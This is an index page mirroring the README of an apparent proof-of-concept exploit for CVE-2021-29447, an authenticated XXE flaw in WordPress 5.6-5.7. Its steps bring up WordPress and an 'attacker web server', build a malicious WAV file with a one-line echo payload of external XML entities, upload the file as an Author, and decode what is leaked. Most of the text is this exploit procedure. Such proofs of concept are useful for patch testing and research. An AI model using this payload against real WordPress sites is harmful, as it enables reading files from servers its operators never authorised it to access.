Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/motikan2010/CVE-2021-29447

WordPress - Authenticated XXE (CVE-2021-29447)
https://github.com/motikan2010/CVE-2021-29447

Last synced: 3 months ago
JSON representation

WordPress - Authenticated XXE (CVE-2021-29447)

Awesome Lists containing this project

README

        

# WordPress 5.6-5.7 - Authenticated (Author+) XXE (CVE-2021-29447)

## Using

### Step1. Run WordPress

```
$ make up-wp
```

### Step2. Run Attacker web server

```
$ make up-mal
```

### Step3. Generate malicious WAV file

#### Without wavefile npm (Recommend)

```
$ echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00%remote;%init;%trick;] >\x00'> malicious.wav
```

#### With wavefile npm

```
$ make make-wav
```

### Step4. Login to WordPress & Upload WAV file to New Media

### Step5. decode

## References

- [WordPress 5.6-5.7 - Authenticated XXE Within the Media Library Affecting PHP 8 Security Vulnerability](https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5)